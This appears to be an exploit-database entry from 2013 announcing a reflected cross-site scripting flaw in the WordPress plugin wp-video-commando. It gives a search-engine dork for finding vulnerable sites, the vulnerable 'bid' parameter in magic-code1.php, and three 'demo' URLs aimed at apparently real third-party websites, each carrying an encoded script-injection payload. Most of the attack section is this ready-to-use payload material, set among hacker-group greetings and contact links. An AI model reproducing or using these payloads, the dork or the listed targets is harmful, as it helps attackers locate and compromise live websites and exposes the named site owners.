id: 20576
date: 03/26/2013
title: Wordpress Plugin wp-video-commando XSS Vulnerability
author: The Black Devils
cves: 

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm The Black Devils member from Inj3ct0r Team         1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title : Wordpress Plugin wp-video-commando XSS Vulnerability 
# Date: 2013-03-15
# Software Link: [ N / A ]
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Tested on: Windows XP SP2
# Category: [webapps]
# Dork : inurl:magic-code1.php?bid=
# Special Thanks To : sH3LL05Dz & Lady NEXA & x3o-1337
# Please Like The New Fb page  : https://fb.com/Th3.Black.D3Vils

-----------


http://127.0.0.1/path/wp-content/plugins/wp-video-commando/magic-code1.php?bid==[ XSS ]



 

# Demo :
http://restaurantmobileprofits.com/site/wp-content/plugins/wp-video-commando/magic-code1.php?bid=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.emergencydentist-southampton.com/wp-content/plugins/wp-video-commando/magic-code1.php?bid=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.camcitygirls.com/wp-content/plugins/wp-video-commando/magic-code1.php?bid=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
-----------
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
            | Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne
            | Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES
            | All Dz hackerz 
-----------
 Contact:
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com

#  0day.today [2023-03-26]  #